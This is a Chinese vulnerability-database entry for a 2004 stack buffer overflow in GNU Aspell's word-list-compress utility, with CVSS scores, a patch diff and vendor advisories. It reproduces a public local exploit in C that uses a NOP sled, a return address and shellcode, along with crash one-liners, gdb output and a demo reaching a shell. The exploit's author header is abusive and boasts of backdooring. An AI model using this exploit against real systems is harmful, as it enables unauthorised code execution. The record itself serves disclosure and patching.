发布时间 :2004-08-06 00:00:00
修订时间 :2016-11-28 14:06:27

[原文]Multiple stack-based buffer overflows in the word-list-compress functionality in compress.c for Aspell allow local users to execute arbitrary code via a long entry in the wordlist that is not properly handled when using the (1) "c" compress option or (2) "d" decompress option.

[CNNVD]GNU Aspell堆栈缓冲区溢出漏洞(CNNVD-200408-109)


- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gnu:aspell:0.50.5GNU Aspell 0.50.5
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040608 Aspell 'word-list-compress' stack overflow vulnerability
(UNKNOWN)  BID  10497

- 漏洞信息

GNU Aspell堆栈缓冲区溢出漏洞
高危 边界条件错误
2004-08-06 00:00:00 2005-10-20 00:00:00

- 公告与补丁

        * 可采用如下临时补丁:
        --- aspell-bug.patch ---
        --- compress.orig.c 2004-06-08 16:37:00.000000000
        +++ compress.c 2004-06-08 16:34:35.000000000 +0100
        @@ -28,6 +28,9 @@
        +int count;
         void usage ()
         fputs("Compresses or uncompresses sorted word
        lists.\n" , stderr);
        @@ -47,6 +50,7 @@
         *w++ = (char)(c);
         } while (c = getc(in), c != EOF && c > 32);
         *w = '\0';
        + count++;
         ungetc(c, in);
         if (c == EOF) return 0;
         else return 1;
        @@ -69,6 +73,7 @@
         SETBIN (stdout);
        + while(count < 256) {
         while (get_word(stdin, cur)) {
         int i = 0;
         /* get the length of the prefix */
        @@ -85,6 +90,7 @@
         prev = s2; cur = s1;
        + }
         return 0;
         } else if (argv[1][0] == 'd') {
        @@ -100,8 +106,11 @@
         if (i == 0)
         i = getc(stdin);
        - while ((c = getc(stdin)) > 32)
        + while ((c = getc(stdin)) > 32 && count < 256) {
         cur[i++] = (char)c;
        + count++;
        + }
         cur[i] = '\0';
         fputs(cur, stdout);
         putc('\n', stdout);
        --- EOF ---

- 漏洞信息 (669)

Aspell (word-list-compress) Command Line Stack Overflow (EDBID:669)
linux local
2004-12-01 Verified
0 c0d3r
N/A [点击下载]
  Fuck private exploits .
  Fuck iranian hacking (and security !!) teams who are just some fucking kiddies.
  Fuck all "Security money makers"
  word-list-compress local exploit - SECU
  Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com
  word-list-compress is not setuid . so good for backdooring .
  gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members.
  we are : LorD - c0d3r - NT ; 6667 #ihs

#define NOP 0x90
#define address 0xbffff2b8
#define size 350
unsigned long get_sp(void)
        __asm__("movl %esp, %eax");
int main()
char shellcode[] = /* 37 bytes shellcode written by myself */
char exploit[size] ;
char *ptr;
long *addr_ptr;
char test[300];
long addr;
int NL= 180 ;

int i ;
int x=0 ;
ptr = exploit;
addr_ptr = (long *) ptr;

for(i=0;i < size;i+=4){
*(addr_ptr++) = address;
for(i=0 ; i < NL ; i++ )
exploit[i] = NOP;
if(shellcode != NULL){
while(x != strlen(shellcode)){
exploit[NL] = shellcode[x];

exploit[size] = 0x00;

printf("word-list-compress local exploit by root / c0d3r\n");
printf("stack pointer: 0x%x\n", get_sp());
printf("using return address : 0x%x\n", address);
printf("using %d bytes shellcode\n", sizeof(shellcode));
setenv("exploit", exploit, 1);
printf("exploit string loaded into the enviroment\n");
system("echo $exploit | word-list-compress c");
return 0;


root@darkstar:/sploits# word-list-compress
Compresses or uncompresses sorted word lists.
For best result the locale should be set to C
before sorting by setting the environmental
variable LANG to "C" before sorting.
Copyright 2001 by Kevin Atkinson.
Usage: word-list-compress c[ompress]|d[ecompress]


root@darkstar:/sploits# echo `perl -e 'print "A"x300'` |
word-list-compress c
Segmentation fault (core dumped)
root@darkstar:/sploits# gdb -c core
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux".
Core was generated by `word-list-compress c'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40154c20 1075137568
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffff560 0xbffff560
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x210246 2163270
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
---Type <return> to continue, or q <return> to quit---


root@darkstar:/sploits# gcc word-list-compress.c -o word-list-compress
word-list-compress.c:65:2: warning: no newline at end of file
root@darkstar:/sploits# ./word-list-compress
word-list-compress local exploit by root / c0d3r
stack pointer: 0xbffff268
using return address : 0xbffff2b8
using 37 bytes shellcode
exploit string loaded into the enviroment
 [1 C[C KS /bin/sh sh-2.05b# echo IHS


thats all . have fun !

// [2004-12-01]

- 漏洞信息

Aspell word-list-compress Local Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Aspell. The issue is due to a boundary error within the word-list-compress utility when processing word lists. By sending a specially crafted word list containing an overly long string (more than 256 bytes), an remote attacker can cause a buffer overflow and execute arbitrary code on the system, resulting in a loss of confidentiality and integrity.

- 时间线

2004-06-08 Unknow
2004-06-08 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Kevin Atkinson has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

GNU Aspell Stack Buffer Overflow Vulnerability
Boundary Condition Error 10497
No Yes
2004-06-08 12:00:00 2009-07-12 05:16:00
Shaun Colley <> disclosed this vulnerability to Bugtraq.

- 受影响的程序版本

Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
GNU Aspell 0.50.5
Gentoo Linux 1.4

- 漏洞讨论

It is reported that the word-list-compress utility, which is a part of aspell contains a buffer overflow vulnerability.

The word-list-compress utility is used for the compression and decompression of word lists. Improper bounds checking allows a buffer overflow condition allowing code execution in the context of the victim's account.

An attacker would have to have access to influence the contents of another user's dictionary to successfully exploit this issue. Potentially through social engineering, improper file permissions, or a file association vulnerability.

- 漏洞利用

Some proof of concept examples were provided by Shaun Colley &lt;;.

echo `perl -e 'print "a"x1000'` | word-list-compress c
echo `perl -e 'print "a"x1000'` | word-list-compress d

These commands should produce a segmentation fault, with the resulting core dumps showing the ability of the attacker to influence the execution of the utility.

c0d3r / root . provided a proof of concept exploit:

- 解决方案

Mandrake has released an advisory (MDKSA-2004:153) dealing with this issue. Please see the referenced advisory for more information.

Gentoo Linux has released advisory GLSA 200406-14 dealing with this issue. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following as superuser:
emerge sync
emerge -pv ">=app-text/aspell-0.50.5-r2"
emerge ">=app-text/aspell-0.50.5-r2"

Gentoo has released a revision to their initial advisory. User's are recommended to update their packages to the latest available using the emerge tool. Please see the referenced advisory for more information.

OpenPKG has released an advisory (OpenPKG-SA-2004.042) dealing with this issue. Please see the referenced advisory for more information.

GNU Aspell 0.50.5

Mandriva Linux Mandrake 10.0

Mandriva Linux Mandrake 10.0 AMD64

Mandriva Linux Mandrake 10.1

Mandriva Linux Mandrake 10.1 x86_64

- 相关参考